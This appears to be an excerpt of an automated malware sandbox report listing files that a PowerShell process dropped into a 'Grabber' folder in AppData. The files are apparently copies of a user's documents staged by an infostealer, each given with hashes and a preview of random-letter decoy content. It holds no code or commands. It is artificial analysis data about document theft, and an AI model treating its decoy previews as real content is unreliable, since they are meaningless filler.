Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\EWZCVGNOWT.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.690071120548773
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                      MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                      SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                      SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                      SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\EFOYFBOLXA\ZGGKNSUKOP.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\EIVQSAOTAQ.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.692024230831571
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                      MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                      SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                      SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                      SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\EWZCVGNOWT.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.690071120548773
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                      MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                      SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                      SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                      SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\GLTYDMDUST.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69569301223482
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
                                                                                      MD5:CA404BEA65D84F58838AF73B2DC67E02
                                                                                      SHA1:56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
                                                                                      SHA-256:4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
                                                                                      SHA-512:10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.697358951122591
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB\DUUDTUBZFW.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Documents\GRXZDKKVDB\EIVQSAOTAQ.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.692024230831571
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                      MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                      SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                      SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                      SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

